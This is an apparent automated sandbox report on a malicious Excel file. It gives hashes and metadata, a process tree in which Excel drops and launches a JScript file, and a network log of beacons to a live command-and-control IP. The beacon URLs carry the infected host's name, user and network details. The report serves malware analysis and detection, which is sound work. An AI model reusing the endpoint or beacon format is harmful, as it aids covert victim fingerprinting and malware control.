File name: | 00369370.xls |
Full analysis: | https://app.any.run/tasks/77f93982-6924-40b3-a934-f78a95e2597a |
Verdict: | Malicious activity |
Analysis date: | October 19, 2020, 21:51:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Subject: M % fx9SFNFzx0Z, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Oct 19 11:38:48 2020, Security: 0 |
MD5: | 0801310447AC6FF3DB5E3447DFB7EA51 |
SHA1: | 021636550DC9FC56B349C4725CFA016B21EBE3DD |
SHA256: | 706BCE767F11302A38F1D5EA4FF46C77889925644990970CA1CEE736032B1437 |
SSDEEP: | 12288:H1AI+sRKvwdFWakZGQppX0t4gT7CSPkoAhxLlekoA9lbXrz6tQkoAfNRplkoAIz/:Hh |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 31 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
Company: | - |
Manager: | - |
Category: | - |
CodePage: | Windows Cyrillic |
Security: | None |
ModifyDate: | 2020:10:19 10:38:48 |
CreateDate: | 2015:06:05 18:17:20 |
Software: | Microsoft Excel |
LastModifiedBy: | - |
Author: | - |
Subject: | M % fx9SFNFzx0Z |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1336 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1772 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\icon.txtense.jse" | C:\Windows\System32\WScript.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
492 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3720 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\Public\Documents\icon.txtense.jse" | C:\Program Files\Notepad++\notepad++.exe | explorer.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: Notepad++ : a free (GNU) source code editor Version: 7.51 | ||||
4044 | "C:\Program Files\Notepad++\updater\gup.exe" -v7.51 | C:\Program Files\Notepad++\updater\gup.exe | notepad++.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: GUP : a free (LGPL) Generic Updater Exit code: 4294967295 Version: 4.1 | ||||
3356 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\icon.txtense.jse" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1336 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR43E4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1336 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\00369370.xls.LNK | lnk | |
MD5:D844307CE3391E7361899A698E9F970E | SHA256:A1C636B4F78BEE0B2E516FD07C3871F5340339D82C1A532CAB14697C5FA225E7 | |||
1336 | EXCEL.EXE | C:\Users\Public\Documents\icon.txtense.jse | text | |
MD5:AD62B4429562C14D90E217A46F743BAC | SHA256:017DCD5B7421FE6FB71B140F3DFD0051846416D87EA26E7C34A2C6D7E7A9EC13 | |||
1336 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exd | tlb | |
MD5:D3C12DD09DD47640A34BD32E646D6772 | SHA256:3572936692EA660FAC40DEE2B3B0BC5B6F2B2ED1796780DED9D4B318BFCB8003 | |||
1336 | EXCEL.EXE | C:\Users\Public\Documents\icon.txt | text | |
MD5:AD62B4429562C14D90E217A46F743BAC | SHA256:017DCD5B7421FE6FB71B140F3DFD0051846416D87EA26E7C34A2C6D7E7A9EC13 | |||
1336 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DA85C2B.emf | emf | |
MD5:A7AB69B742BAEEA6365B31084A55EC0C | SHA256:9D86FA02D0E06F4956AFA0EE43A513E9DED87FE1AEB5E7A94CC3881A3311B3D4 | |||
1336 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:3E7D7AB0A97664A36C02CEBC0690E921 | SHA256:1631F8B21FE820387BDF5D7522CC96DE97BDCF8FA44363B7DCAFC43B400F90E5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&25010062 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&120017734 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&1497019835 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&674521590 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&137075153 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&1470815840 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&8827365 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&123989687 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&16582858 | PL | — | — | suspicious |
1772 | WScript.exe | GET | 200 | 188.116.36.154:443 | https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&908815358 | PL | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3356 | WScript.exe | 188.116.36.154:443 | — | NEPHAX Spolka jawna Arkadiusz Kawalec Michal Podsiadly | PL | suspicious |
1772 | WScript.exe | 188.116.36.154:443 | — | NEPHAX Spolka jawna Arkadiusz Kawalec Michal Podsiadly | PL | suspicious |
4044 | gup.exe | 104.31.89.28:443 | notepad-plus-plus.org | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
notepad-plus-plus.org |
| whitelisted |
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|